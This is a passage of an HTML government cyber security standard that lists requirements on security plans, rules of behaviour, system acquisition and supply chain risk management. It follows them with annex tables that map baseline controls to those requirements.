system</li> <li>describes the safeguards in place or planned for meeting the security requirements</li> <li>identifies individuals that fulfill system roles and responsibilities</li> <li>includes other relevant information necessary for the protection of specified information</li> </ol></li> <li>Review and update the system security plan [Assignment: organization-defined frequency]</li> <li>Protect the system security plan from unauthorized disclosure</li> </ol><h5>Discussion</h5> <p>System security and privacy plans provide key characteristics of the system that is processing, storing, and transmitting specified information and how the system and information are protected. 
System security and privacy plans contain sufficient information to facilitate a design and implementation that are unambiguously compliant with the intent of the plans and the subsequent determinations of risk if the plan is implemented as intended. System security and privacy plans can be a collection of documents, including documents that already exist. Effective system security plans make use of references to policies, procedures, and additional documents (e.g., design specifications) where detailed information can be obtained. This reduces the documentation requirements associated with security programs and maintains security information in other established management or operational areas related to enterprise architecture, the system development life cycle, systems engineering, and acquisition.</p> <h5>References</h5> <p>Source control: PL-02<br /> Supporting publications:</p> <ul><li>Cyber Centre Organizational cyber security and privacy risk management activities (ITSP.10.036)</li> <li><a href="https://csrc.nist.gov/pubs/sp/800/18/r1/final">NIST SP 800-18 Guide for Developing Security Plans for Federal Information Systems</a></li> </ul></details><details><summary><h4 id="03-15-03">03.15.03 Rules of behaviour</h4> </summary><ol class="lst-upr-alph"><li>Establish rules that describe the responsibilities and expected behaviour for system usage and protecting specified information</li> <li>Provide rules to individuals who require access to the system</li> <li>Receive a documented acknowledgement from individuals indicating that they have read, understand, and agree to abide by the rules of behaviour before authorizing access to specified information and the system</li> <li>Review and update the rules of behaviour [Assignment: organization-defined frequency]</li> </ol><h5>Discussion</h5> <p>Rules of behaviour represent a type of access agreement for system users. 
Organizations consider rules of behaviour for the handling of specified information based on individual user roles and responsibilities and differentiate between rules that apply to privileged users and rules that apply to general users.</p> <h5>References</h5> <p>Source control: PL-04<br /> Supporting publications:</p> <ul><li>Cyber Centre Organizational cyber security and privacy risk management activities (ITSP.10.036)</li> <li><a href="https://csrc.nist.gov/pubs/sp/800/18/r1/final">NIST SP 800-18 Guide for Developing Security Plans for Federal Information Systems</a></li> </ul></details></section><section><h3 class="h2 mrgn-tp-lg" id="3-16">3.16 System and services acquisition</h3> <p>The System and services acquisition controls deal with the contracting of products and services required to support the implementation and operation of organizational systems. 
They ensure that sufficient resources are allocated for the protection of organizational systems, and they support system development lifecycle processes that incorporate security considerations.</p> <details><summary><h4 id="03-16-01">03.16.01 Security engineering principles</h4> </summary><p>Apply the following systems security engineering principles to the development or modification of the system and system components: [Assignment: organization-defined systems security engineering principles].</p> <h5>Discussion</h5> <p>Organizations apply systems security engineering principles to new development systems. For legacy systems, organizations apply systems security engineering principles to system modifications to the extent feasible, given the current state of hardware, software, and firmware components. The application of systems security engineering principles helps to develop trustworthy, secure, and resilient systems and reduce the susceptibility of organizations to disruptions, hazards, and threats. Examples include developing layered protections; establishing security policies, architectures, and controls as the foundation for system design; incorporating security requirements into the system development life cycle; delineating physical and logical security boundaries; ensuring that developers are trained on how to build trustworthy secure software; and performing threat modeling to identify use cases, threat agents, attack vectors and patterns, design patterns, and compensating controls needed to mitigate risk. 
Organizations that apply security engineering principles can facilitate the development of trustworthy, secure systems, system components, and system services; reduce risks to acceptable levels; and make informed risk-management decisions.</p> <h5>References</h5> <p>Source control: SA-08<br /> Supporting publications:</p> <ul><li>Cyber Centre System lifecycle cyber security and privacy risk management activities (ITSP.10.037)</li> <li><a href="https://csrc.nist.gov/pubs/sp/800/160/v1/r1/final">NIST SP 800-160-1 Engineering Trustworthy Secure Systems</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/160/v2/r1/final">NIST SP 800-160-2 Developing Cyber-Resilient Systems: A Systems Security Engineering Approach</a></li> </ul></details><details><summary><h4 id="03-16-02">03.16.02 Unsupported system components</h4> </summary><ol class="lst-upr-alph"><li>Replace system components when support for the components is no longer available from the developer, vendor, or manufacturer</li> <li>Provide options for risk mitigation or alternative sources for continued support for unsupported components if components cannot be replaced</li> </ol><h5>Discussion</h5> <p>Support for system components includes software patches, firmware updates, replacement parts, and maintenance contracts. Components become unsupported when, for example, vendors no longer provide critical software patches or product updates, which creates opportunities for adversaries to exploit weaknesses or deficiencies in the installed components. 
Exceptions to replacing unsupported system components include systems that provide critical mission or business capabilities when newer technologies are unavailable or when the systems are so isolated that installing replacement components is not an option.</p> <p>Alternative sources of support address the need to provide continued support for system components that are no longer supported by the original manufacturers, developers, or vendors when such components remain essential to organizational mission and business functions. If necessary, organizations can establish in-house support by developing customized patches for critical software components or obtain the services of external providers who provide ongoing support for unsupported components through contractual relationships. Such contractual relationships can include open-source software value-added vendors. The increased risk of using unsupported system components can be mitigated by prohibiting the connection of such components to public or uncontrolled networks or implementing other forms of isolation.</p> <h5>References</h5> <p>Source control: SA-22<br /> Supporting publications: None</p> </details><details><summary><h4 id="03-16-03">03.16.03 External system services</h4> </summary><ol class="lst-upr-alph"><li>Require the providers of external system services used for the processing, storage, or transmission of specified information to comply with the following security requirements: [Assignment: organization-defined security requirements]</li> <li>Define and document user roles and responsibilities with regard to external system services, including shared responsibilities with external service providers</li> <li>Implement processes, methods, and techniques to monitor security requirement compliance by external service providers on an ongoing basis</li> </ol><h5>Discussion</h5> <p>External system services are provided by external service providers. 
Organizations establish relationships with external service providers in a variety of ways, including through business partnerships, contracts, interagency agreements, lines of business arrangements, licensing agreements, joint ventures, and supply chain exchanges. The responsibility for managing risks from the use of external system services remains with the organization charged with protecting specified information. Service-level agreements define expectations of performance, describe measurable outcomes, and identify remedies, mitigations, and response requirements for instances of noncompliance. Information from external service providers regarding the specific functions, ports, protocols, and services used in the provision of such services can be useful when there is a need to understand the trade-offs involved in restricting certain functions and services or blocking certain ports and protocols. This requirement is related to <a href="#03-01-20">Use of external systems 03.01.20</a>.</p> <h5>References</h5> <p>Source control: SA-09<br /> Supporting publications:</p> <ul><li><a href="https://csrc.nist.gov/pubs/sp/800/160/v1/r1/final">NIST SP 800-160-1 Engineering Trustworthy Secure Systems</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/161/r1/final">NIST SP 800-161 Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations</a></li> </ul></details></section><section><h3 class="h2 mrgn-tp-lg" id="3-17">3.17 Supply chain risk management</h3> <p>The Supply chain risk management controls support the mitigation of cyber security risks throughout all phases of the supply chain.</p> 
<details><summary><h4 id="03-17-01">03.17.01 Supply chain risk management plan</h4> </summary><ol class="lst-upr-alph"><li>Develop a plan for managing supply chain risks associated with the research, development, design, manufacturing, acquisition, delivery, integration, operations, maintenance, and disposal of the system, system components, or system services</li> <li>Review and update the supply chain risk management plan [Assignment: organization-defined frequency]</li> <li>Protect the supply chain risk management plan from unauthorized disclosure</li> </ol><h5>Discussion</h5> <p>Dependence on the products, systems, and services of external providers and the nature of the relationships with those providers present an increasing level of risk to an organization. Threat actions that may increase security or privacy risks include unauthorized production, the insertion or use of counterfeits, tampering, poor manufacturing and development practices in the supply chain, theft, and the insertion of malicious software, firmware, and hardware. Supply chain risks can be endemic or systemic within a system, component, or service. Managing supply chain risks is a complex, multifaceted undertaking that requires a coordinated effort across an organization to build trust relationships and communicate with internal and external stakeholders.</p> <p>Supply chain risk management (SCRM) activities include identifying and assessing risks, determining appropriate risk response actions, developing <abbr title="supply chain risk management">SCRM</abbr> plans to document response actions, and monitoring performance against the plans. 
The system-level <abbr title="supply chain risk management">SCRM</abbr> plan is implementation-specific and provides policy implementation, requirements, constraints, and implications. It can either be stand-alone or incorporated into system security and privacy plans. The <abbr title="supply chain risk management">SCRM</abbr> plan addresses the management, implementation, and monitoring of <abbr title="supply chain risk management">SCRM</abbr> controls and the development or sustainment of systems across the system development life cycle to support mission and business functions. Because supply chains can differ significantly across and within organizations, <abbr title="supply chain risk management">SCRM</abbr> plans are tailored to individual program, organizational, and operational contexts.</p> <h5>References</h5> <p>Source control: SR-02<br /> Supporting publications:</p> <ul><li><a href="https://www.cyber.gc.ca/en/tools-services/harmonized-tra-methodology">CSE-<abbr title="Royal Canadian Mounted Police">RCMP</abbr> Harmonized Threat and Risk Assessment Methodology (TRA-1)</a></li> <li>Cyber Centre Organizational cyber security and privacy risk management activities (ITSP.10.036)</li> <li><a href="https://www.cyber.gc.ca/en/guidance/protecting-your-organization-software-supply-chain-threats-itsm10071">Cyber Centre Protecting your organization from software supply chain threats (ITSM.10.071)</a></li> <li><a href="https://www.cyber.gc.ca/en/guidance/cyber-supply-chain-approach-assessing-risk-itsap10070">Cyber Centre Cyber supply chain: An approach to assessing risk (ITSAP.10.070)</a></li> <li><a href="https://www.cyber.gc.ca/en/guidance/supply-chain-security-small-and-medium-sized-organizations-itsap00070">Cyber Centre Supply chain security for small and medium-sized organizations (ITSAP.00.070)</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/160/v1/r1/final">NIST SP 800-160-1 Engineering Trustworthy Secure Systems</a></li> <li><a 
href="https://csrc.nist.gov/pubs/sp/800/181/r1/final">NIST SP 800-181 Workforce Framework for Cybersecurity (NICE Framework)</a></li> </ul></details><details><summary><h4 id="03-17-02">03.17.02 Acquisition strategies, tools, and methods</h4> </summary><p>Develop and implement acquisition strategies, contract tools, and procurement methods to identify, protect against, and mitigate supply chain risks.</p> <h5>Discussion</h5> <p>The acquisition process provides an important vehicle for protecting the supply chain. There are many useful tools and techniques available, including obscuring the end use of a system or system component, using blind purchases, requiring tamper-evident packaging, or using trusted or controlled distribution. The results from a supply chain risk assessment can inform the strategies, tools, and methods that are most applicable to the situation. Tools and techniques may provide protections against unauthorized production, theft, tampering, the insertion of counterfeits, the insertion of malicious software or backdoors, and poor development practices throughout the system life cycle.</p> <p>Organizations also consider providing incentives for suppliers to implement controls, promote transparency in their processes and security practices, provide contract language that addresses the prohibition of tainted or counterfeit components, and restrict purchases from untrustworthy suppliers. Organizations consider providing training, education, and awareness programs for personnel regarding supply chain risks, available mitigation strategies, and when the programs should be employed. Methods for reviewing and protecting development plans, documentation, and evidence are commensurate with the security requirements of the organization. 
Contracts may specify documentation protection requirements.</p> <h5>References</h5> <p>Source control: SR-05<br /> Supporting publications:</p> <ul><li><a href="https://www.cyber.gc.ca/en/tools-services/harmonized-tra-methodology">CSE-<abbr title="Royal Canadian Mounted Police">RCMP</abbr> Harmonized Threat and Risk Assessment Methodology (TRA-1) </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/161/r1/final">NIST SP 800-161 Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations </a></li> </ul></details><details><summary><h4 id="03-17-03">03.17.03 Supply chain requirements and processes</h4> </summary><ol class="lst-upr-alph"><li>Establish a process for identifying and addressing weaknesses or deficiencies in the supply chain elements and processes</li> <li>Enforce the following security requirements to protect against supply chain risks to the system, system components, or system services and to limit the harm or consequences from supply chain-related events: [Assignment: organization-defined security requirements]</li> </ol><h5>Discussion</h5> <p>Supply chain elements include organizations, entities, or tools that are employed for the research, development, design, manufacturing, acquisition, delivery, integration, operations, maintenance, and disposal of systems and system components. Supply chain processes include hardware, software, firmware, and systems development processes; shipping and handling procedures; physical security programs; personnel security programs; configuration management tools, techniques, and measures to maintain provenance; or other programs, processes, or procedures associated with the development, acquisition, maintenance, and disposal of systems and system components. Supply chain elements and processes may be provided by organizations, system integrators, or external providers. 
Weaknesses or deficiencies in supply chain elements or processes represent potential vulnerabilities that can be exploited by adversaries to harm the organization and affect its ability to carry out its core missions or business functions.</p> <h5>References</h5> <p>Source control: SR-03<br /> Supporting publications:</p> <ul><li><a href="https://www.cyber.gc.ca/en/tools-services/harmonized-tra-methodology">CSE-<abbr title="Royal Canadian Mounted Police">RCMP</abbr> Harmonized Threat and Risk Assessment Methodology (TRA-1)</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/161/r1/final">NIST SP 800-161 Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations</a></li> </ul></details></section></section><section><h2 class="text-info" id="AA">Annex A Tailoring criteria</h2> <section><h3>In this section</h3> <ul class="list-unstyled"><li><a href="#tab1">Table 1: Access control (AC)</a></li> <li><a href="#tab2">Table 2: Awareness and training (AT)</a></li> <li><a href="#tab3">Table 3: Audit and accountability (AU)</a></li> <li><a href="#tab4">Table 4: Assessment, authorization, and monitoring (CA)</a></li> <li><a href="#tab5">Table 5: Configuration management (CM)</a></li> <li><a href="#tab6">Table 6: Contingency planning (CP)</a></li> <li><a href="#tab7">Table 7: Identification and Authentication (IA)</a></li> <li><a href="#tab8">Table 8: Incident Response (IR)</a></li> <li><a href="#tab9">Table 9: Maintenance (MA)</a></li> <li><a href="#tab10">Table 10: Media protection (MP)</a></li> <li><a href="#tab11">Table 11: Physical and environmental protection (PE)</a></li> <li><a href="#tab12">Table 12: Planning (PL)</a></li> <li><a href="#tab13">Table 13: Program management 
(PM)</a></li> <li><a href="#tab14">Table 14: Personnel security (PS)</a></li> <li><a href="#tab15">Table 15: Personal information handling and transparency (PT)</a></li> <li><a href="#tab16">Table 16: Risk assessment (RA)</a></li> <li><a href="#tab17">Table 17: System and services acquisition (SA)</a></li> <li><a href="#tab18">Table 18: System and communications protection (SC)</a></li> <li><a href="#tab19">Table 19: System and information integrity (SI)</a></li> <li><a href="#tab20">Table 20: Supply chain risk management (SR)</a></li> </ul></section><p>This annex describes the security control tailoring criteria used to develop the specified information security requirements. Table 1 through Table 20 specify the tailoring actions applied to the controls in the ITSP.10.033-01 medium impact baseline to obtain the security requirements in section 3. The controls, assurance activities, and enhancements are hyperlinked to their corresponding entry in ITSP.10.033.</p> <p>The security control tailoring criteria are the following:</p> <ul><li>NCO: the control is not directly related to protecting the confidentiality of specified information</li> <li><abbr title="Government of Canada">GC</abbr>: the control is primarily the responsibility of the Government of Canada</li> <li>ORC: the outcome of the control related to protecting the confidentiality of specified information is adequately covered by other related controls</li> <li>N/A: the control is not applicable</li> <li>C: the control is directly related to protecting the confidentiality of specified information</li> </ul><div class="table-responsive col-md-12"> <table class="table table-bordered" id="tab1"><caption>Table 1: Access control (AC)</caption> <thead><tr class="active"><th class="text-center" scope="col">Control / activity number</th> <th class="text-center" scope="col">ITSP.10.033-01 Medium impact baseline</th> <th class="text-center" scope="col">Tailoring criteria</th> <th 
class="text-center" scope="col">Security requirement</th> </tr></thead><tbody><tr><td>AC-01</td> <td>Access control policy and procedures </td> <td>C</td> <td><a href="#03-15-01">Policy and procedures 03.15.01</a></td> </tr><tr><td>AC-02</td> <td>Account management</td> <td>C</td> <td><a href="#03-01-01">Account management 03.01.01</a></td> </tr><tr><td>AC-02(01)</td> <td>Account management: Automated system account management</td> <td>NCO</td> <td>none</td> </tr><tr><td>AC-02(02)</td> <td>Account management: Automated temporary and emergency account management</td> <td>NCO</td> <td>none</td> </tr><tr><td>AC-02(03)</td> <td>Account management: Disable accounts</td> <td>C</td> <td><a href="#03-01-01">Account management 03.01.01</a></td> </tr><tr><td>AC-02(04)</td> <td>Account management: Automated audit actions</td> <td>NCO</td> <td>none</td> </tr><tr><td>AC-02(05)</td> <td>Account management: Inactivity logout</td> <td>C</td> <td><a href="#03-01-01">Account management 03.01.01</a></td> </tr><tr><td>AC-02(07)</td> <td>Account management: Privileged user accounts</td> <td>NCO</td> <td>none</td> </tr><tr><td>AC-02(13)</td> <td>Account management: Disable accounts for high-risk individuals</td> <td>C</td> <td><a href="#03-01-01">Account management 03.01.01</a></td> </tr><tr><td>AC-03</td> <td>Access enforcement</td> <td>C</td> <td><a href="#03-01-02">Access enforcement 03.01.02</a></td> </tr><tr><td>AC-03(02)</td> <td>Access enforcement: Dual authorization</td> <td>NCO</td> <td>none</td> </tr><tr><td>AC-03(04)</td> <td>Access enforcement: Discretionary access control</td> <td>ORC</td> <td>none</td> </tr><tr><td>AC-03(09)</td> <td>Access enforcement: Controlled release</td> <td>ORC</td> <td>none</td> </tr><tr><td>AC-04</td> <td>Information flow enforcement</td> <td>C</td> <td><a href="#03-01-03">Information flow enforcement 03.01.03</a></td> </tr><tr><td>AC-05</td> <td>Separation of duties</td> <td>C</td> <td><a href="#03-01-04">Separation of duties 03.01.04</a></td> 
</tr><tr><td>AC-06</td> <td>Least privilege</td> <td>C</td> <td><a href="#03-01-05">Least privilege 03.01.05</a></td> </tr><tr><td>AC-06(01)</td> <td>Least privilege: Authorize access to security functions</td> <td>C</td> <td><a href="#03-01-05">Least privilege 03.01.05</a></td> </tr><tr><td>AC-06(02)</td> <td>Least privilege: Non-privileged access for non-security functions</td> <td>C</td> <td><a href="#03-01-06">Least privilege – privileged accounts 03.01.06</a></td> </tr><tr><td>AC-06(05)</td> <td>Least privilege: Privileged accounts</td> <td>C</td> <td><a href="#03-01-06">Least privilege – privileged accounts 03.01.06</a></td> </tr><tr><td>AC-06(07)</td> <td>Least privilege: Review of user privileges</td> <td>C</td> <td><a href="#03-01-05">Least privilege 03.01.05</a></td> </tr><tr><td>AC-06(09)</td> <td>Least privilege: Log use of privileged functions</td> <td>C</td> <td><a href="#03-01-07">Privileged accounts – privileged functions 03.01.07</a></td> </tr><tr><td>AC-06(10)</td> <td>Least privilege: Prohibit non-privileged users from executing privileged functions</td> <td>C</td> <td><a href="#03-01-07">Privileged accounts – privileged functions 03.01.07</a></td> </tr><tr><td>AC-07</td> <td>Unsuccessful logon attempts</td> <td>C</td> <td><a href="#03-01-08">Unsuccessful logon attempts 03.01.08</a></td> </tr><tr><td>AC-08</td> <td>System use notification</td> <td>C</td> <td><a href="#03-01-09">System use notification 03.01.09</a></td> </tr><tr><td>AC-11</td> <td>Device lock</td> <td>C</td> <td><a href="#03-01-10">Device lock 03.01.10</a></td> </tr><tr><td>AC-11(01)</td> <td>Device lock: Pattern-hiding displays</td> <td>C</td> <td><a href="#03-01-10">Device lock 03.01.10</a></td> </tr><tr><td>AC-12</td> <td>Session termination</td> <td>C</td> <td><a href="#03-01-11">Session termination 03.01.11</a></td> </tr><tr><td>AC-14</td> <td>Permitted actions without identification or authentication</td> <td>GC</td> <td>none</td> </tr><tr><td>AC-16</td> <td>Security and 
privacy attributes</td> <td>ORC</td> <td>none</td> </tr><tr><td>AC-16(02)</td> <td>Security and privacy attributes: Attribute value changes by authorized individuals</td> <td>ORC</td> <td>none</td> </tr><tr><td>AC-16(05)</td> <td>Security and privacy attributes: Attribute displays on objects to be output</td> <td>ORC</td> <td>none</td> </tr><tr><td>AC-17</td> <td>Remote access</td> <td>C</td> <td><a href="#03-01-02">Access enforcement 03.01.02</a></td> </tr><tr><td>AC-17(01)</td> <td>Remote access: Monitoring and control</td> <td>NCO</td> <td>none</td> </tr><tr><td>AC-17(02)</td> <td>Remote access: Protection of confidentiality and integrity using encryption</td> <td>C</td> <td><a href="#03-13-08">Transmission and storage confidentiality 03.13.08</a></td> </tr><tr><td>AC-17(03)</td> <td>Remote access: Managed access control points</td> <td>C</td> <td><a href="#03-01-12">Remote access 03.01.12</a></td> </tr><tr><td>AC-17(04)</td> <td>Remote access: Privileged commands and access</td> <td>C</td> <td><a href="#03-01-12">Remote access 03.01.12</a></td> </tr><tr><td>AC-17(400)</td> <td>Remote access: Privileged accounts remote access</td> <td>ORC</td> <td>none</td> </tr><tr><td>AC-18</td> <td>Wireless access</td> <td>C</td> <td><a href="#03-01-16">Wireless access 03.01.16</a></td> </tr><tr><td>AC-18(01)</td> <td>Wireless access: Authentication and encryption</td> <td>C</td> <td><a href="#03-01-16">Wireless access 03.01.16</a></td> </tr><tr><td>AC-18(03)</td> <td>Wireless access: Disable wireless networking</td> <td>C</td> <td><a href="#03-01-16">Wireless access 03.01.16</a></td> </tr><tr><td>AC-18(04)</td> <td>Wireless access: Restrict configurations by users</td> <td>ORC</td> <td>none</td> </tr><tr><td>AC-19</td> <td>Access control for mobile devices</td> <td>C</td> <td><a href="#03-01-18">Access control for mobile devices 03.01.18</a></td> </tr><tr><td>AC-19(05)</td> <td>Access control for mobile devices: Full device or container-based encryption</td> <td>C</td> 
<td><a href="#03-01-18">Access control for mobile devices 03.01.18</a></td> </tr><tr><td>AC-20</td> <td>Use of external systems</td> <td>C</td> <td><a href="#03-01-20">Use of external systems 03.01.20</a></td> </tr><tr><td>AC-20(01)</td> <td>Use of external systems: Limits on authorized use</td> <td>C</td> <td><a href="#03-01-20">Use of external systems 03.01.20</a></td> </tr><tr><td>AC-20(02)</td> <td>Use of external systems: Portable storage devices – restricted use</td> <td>C</td> <td><a href="#03-01-20">Use of external systems 03.01.20</a></td> </tr><tr><td>AC-20(04)</td> <td>Use of external systems: Network accessible storage devices – restricted use</td> <td>ORC</td> <td>none</td> </tr><tr><td>AC-21</td> <td>Information sharing</td> <td>GC</td> <td>none</td> </tr><tr><td>AC-21(400)</td> <td>Information sharing: Information sharing agreement</td> <td>GC</td> <td>none</td> </tr><tr><td>AC-21(401)</td> <td>Information sharing: Information sharing arrangement</td> <td>GC</td> <td>none</td> </tr><tr><td>AC-22</td> <td>Publicly accessible content</td> <td>C</td> <td><a href="#03-01-22">Publicly accessible content 03.01.22</a></td> </tr></tbody></table></div> <div class="table-responsive col-md-12"> <table class="table table-bordered" id="tab2"><caption>Table 2: Awareness and training (AT)</caption> <thead><tr class="active"><th class="text-center" scope="col">Control / activity number</th> <th class="text-center" scope="col">ITSP.10.033-01 Medium impact baseline</th> <th class="text-center" scope="col">Tailoring criteria</th> <th class="text-center" scope="col">Security requirement</th> </tr></thead><tbody><tr><td>AT-01</td> <td>Awareness and training policy and procedures</td> <td>C</td> <td><a 
href="#03-15-01">Policy and procedures 03.15.01</a></td> </tr><tr><td>AT-02</td> <td>Literacy training and awareness</td> <td>C</td> <td><a href="#03-02-01">Literacy training and awareness 03.02.01</a></td> </tr><tr><td>AT-02(02)</td> <td>Literacy training and awareness: Insider threat</td> <td>C</td> <td><a href="#03-02-01">Literacy training and awareness 03.02.01</a></td> </tr><tr><td>AT-02(03)</td> <td>Literacy training and awareness: Social engineering and mining</td> <td>C</td> <td><a href="#03-02-01">Literacy training and awareness 03.02.01</a></td> </tr><tr><td>AT-03</td> <td>Role-based training</td> <td>C</td> <td><a href="#03-02-02">Role-based training 03.02.02</a></td> </tr><tr><td>AT-04</td> <td>Training records</td> <td>NCO</td> <td>none</td> </tr></tbody></table></div> <div class="table-responsive col-md-12"> <table class="table table-bordered" id="tab3"><caption>Table 3: Audit and accountability (AU)</caption> <thead><tr class="active"><th class="text-center" scope="col">Control / activity number</th> <th class="text-center" scope="col">ITSP.10.033-01 Medium impact baseline</th> <th class="text-center" scope="col">Tailoring criteria</th> <th class="text-center" scope="col">Security requirement</th> </tr></thead><tbody><tr><td>AU-01</td> <td>Audit and accountability policy and procedures</td> <td>C</td> <td><a href="#03-15-01">Policy and procedures 03.15.01</a></td> </tr><tr><td>AU-02</td> <td>Event logging</td> <td>C</td> <td><a href="#03-03-01">Event logging 03.03.01</a></td> </tr><tr><td>AU-03</td> <td>Content of audit records</td> <td>C</td> <td><a href="#03-03-02">Audit record content 03.03.02</a></td> </tr><tr><td>AU-03(01)</td> <td>Content of audit records: Additional audit information</td> <td>C</td> <td><a 
href="#03-03-02">Audit record content 03.03.02</a></td> </tr><tr><td>AU-04</td> <td>Audit log storage capacity</td> <td>NCO</td> <td>none</td> </tr><tr><td>AU-04(01)</td> <td>Audit log storage capacity: Transfer to alternate storage</td> <td>NCO</td> <td>none</td> </tr><tr><td>AU-05</td> <td>Response to audit logging process failures</td> <td>C</td> <td><a href="#03-03-04">Response to audit logging process failures 03.03.04</a></td> </tr><tr><td>AU-05(01)</td> <td>Response to audit logging process failures: Storage capacity warning</td> <td>NCO</td> <td>none</td> </tr><tr><td>AU-06</td> <td>Audit record review, analysis, and reporting</td> <td>C</td> <td><a href="#03-03-05">Audit record review, analysis, and reporting 03.03.05</a></td> </tr><tr><td>AU-06(01)</td> <td>Audit record review, analysis, and reporting: Automated process integration</td> <td>NCO</td> <td>none</td> </tr><tr><td>AU-06(03)</td> <td>Audit record review, analysis, and reporting: Correlate audit record repositories</td> <td>C</td> <td><a href="#03-03-05">Audit record review, analysis, and reporting 03.03.05</a></td> </tr><tr><td>AU-06(04)</td> <td>Audit record review, analysis, and reporting: Central review and analysis</td> <td>NCO</td> <td>none</td> </tr><tr><td>AU-07</td> <td>Audit record reduction and report generation</td> <td>C</td> <td><a href="#03-03-06">Audit record reduction and report generation 03.03.06</a></td> </tr><tr><td>AU-07(01)</td> <td>Audit record reduction and report generation: Automatic processing</td> <td>NCO</td> <td>none</td> </tr><tr><td>AU-08</td> <td>Time stamps</td> <td>C</td> <td><a href="#03-03-07">Time stamps 03.03.07</a></td> </tr><tr><td>AU-09</td> <td>Protection of audit information</td> <td>C</td> <td><a href="#03-03-08">Protection of audit information 03.03.08</a></td> </tr><tr><td>AU-09(02)</td> <td>Protection of audit information: Store on separate physical system or component</td> <td>NCO</td> <td>none</td> </tr><tr><td>AU-09(04)</td> <td>Protection of 
audit information: Access by subset of privileged users</td> <td>C</td> <td><a href="#03-03-08">Protection of audit information 03.03.08</a></td> </tr><tr><td>AU-09(06)</td> <td>Protection of audit information: Read-only access</td> <td>NCO</td> <td>none</td> </tr><tr><td>AU-11</td> <td>Audit record retention</td> <td>C</td> <td><a href="#03-03-03">Audit record generation 03.03.03</a></td> </tr><tr><td>AU-12</td> <td>Audit record generation</td> <td>C</td> <td><a href="#03-03-03">Audit record generation 03.03.03</a></td> </tr><tr><td>AU-12(01)</td> <td>Audit record generation: System-wide and time-correlated audit trail</td> <td>NCO</td> <td>none</td> </tr></tbody></table></div> <div class="table-responsive col-md-12"> <table class="table table-bordered" id="tab4"><caption>Table 4: Assessment, authorization, and monitoring (CA)</caption> <thead><tr class="active"><th class="text-center" scope="col">Control / activity number</th> <th class="text-center" scope="col">ITSP.10.033-01 Medium impact baseline</th> <th class="text-center" scope="col">Tailoring criteria</th> <th class="text-center" scope="col">Security requirement</th> </tr></thead><tbody><tr><td>CA-01</td> <td>Assessment, authorization, and monitoring policy and procedures</td> <td>C</td> <td><a href="#03-15-01">Policy and procedures 03.15.01</a></td> </tr><tr><td>CA-02</td> <td>Control assessments</td> <td>C</td> <td><a href="#03-12-01">Security assessment 03.12.01</a></td> </tr><tr><td>CA-02(01)</td> <td>Control assessments: Independent assessors</td> <td>NCO</td> <td>none</td> </tr><tr><td>CA-03</td> <td>Information exchange</td> <td>C</td> <td><a href="#03-12-05">Information exchange 03.12.05</a></td> </tr><tr><td>CA-05</td> <td>Plan of 
action and milestones</td> <td>C</td> <td><a href="#03-12-02">Plan of action and milestones 03.12.02</a></td> </tr><tr><td>CA-06</td> <td>Authorization</td> <td>GC</td> <td>none</td> </tr><tr><td>CA-07</td> <td>Continuous monitoring</td> <td>C</td> <td><a href="#03-12-03">Continuous monitoring 03.12.03</a></td> </tr><tr><td>CA-07(01)</td> <td>Continuous monitoring: Independent assessment</td> <td>NCO</td> <td>none</td> </tr><tr><td>CA-07(04)</td> <td>Continuous monitoring: Risk monitoring</td> <td>NCO</td> <td>none</td> </tr><tr><td>CA-09</td> <td>Internal system connections</td> <td>NCO</td> <td>none</td> </tr><tr><td>CA-09(01)</td> <td>Internal system connections: Compliance checks</td> <td>ORC</td> <td>none</td> </tr></tbody></table></div> <div class="table-responsive col-md-12"> <table class="table table-bordered" id="tab5"><caption>Table 5: Configuration management (CM)</caption> <thead><tr class="active"><th class="text-center" scope="col">Control / activity number</th> <th class="text-center" scope="col">ITSP.10.033-01 Medium impact baseline</th> <th class="text-center" scope="col">Tailoring criteria</th> <th class="text-center" scope="col">Security requirement</th> </tr></thead><tbody><tr><td>CM-01</td> <td>Configuration management policy and procedures</td> <td>C</td> <td><a href="#03-15-01">Policy and procedures 03.15.01</a></td> </tr><tr><td>CM-02</td> <td>Baseline configuration</td> <td>C</td> <td><a href="#03-04-01">Baseline configuration 03.04.01</a></td> </tr><tr><td>CM-02(02)</td> <td>Baseline configuration: Automation support for accuracy and currency</td> <td>NCO</td> <td>none</td> </tr><tr><td>CM-02(03)</td> <td>Baseline configuration: Retention of previous configurations</td> 
<td>NCO</td> <td>none</td> </tr><tr><td>CM-02(06)</td> <td>Baseline configuration: Development and test environments</td> <td>NCO</td> <td>none</td> </tr><tr><td>CM-02(07)</td> <td>Baseline configuration: Configure systems and components for high-risk areas</td> <td>C</td> <td><a href="#03-04-12">System and component configuration for high-risk areas 03.04.12</a></td> </tr><tr><td>CM-03</td> <td>Configuration change control</td> <td>C</td> <td><a href="#03-04-03">Configuration change control 03.04.03</a></td> </tr><tr><td>CM-03(02)</td> <td>Configuration change control: Testing, validation, and documentation of changes</td> <td>NCO</td> <td>none</td> </tr><tr><td>CM-03(04)</td> <td>Configuration change control: Security and privacy representatives</td> <td>NCO</td> <td>none</td> </tr><tr><td>CM-04</td> <td>Impact analyses</td> <td>C</td> <td><a href="#03-04-04">Impact analyses 03.04.04</a></td> </tr><tr><td>CM-04(01)</td> <td>Impact analyses: Separate test environments</td> <td>NCO</td> <td>none</td> </tr><tr><td>CM-04(02)</td> <td>Impact analyses: Verification of controls</td> <td>C</td> <td><a href="#03-04-04">Impact analyses 03.04.04</a></td> </tr><tr><td>CM-05</td> <td>Access restrictions for change</td> <td>C</td> <td><a href="#03-04-05">Access restrictions for change 03.04.05</a></td> </tr><tr><td>CM-06</td> <td>Configuration settings</td> <td>C</td> <td><a href="#03-04-02">Configuration settings 03.04.02</a></td> </tr><tr><td>CM-07</td> <td>Least functionality</td> <td>C</td> <td><a href="#03-04-06">Least functionality 03.04.06</a></td> </tr><tr><td>CM-07(01)</td> <td>Least functionality: Periodic review</td> <td>C</td> <td><a href="#03-04-06">Least functionality 03.04.06</a></td> </tr><tr><td>CM-07(02)</td> <td>Least functionality: Prevent program execution</td> <td>ORC</td> <td>none</td> </tr><tr><td>CM-07(05)</td> <td>Least functionality: Authorized software – allow by exception</td> <td>C</td> <td><a href="#03-04-08">Authorized software – allow by 
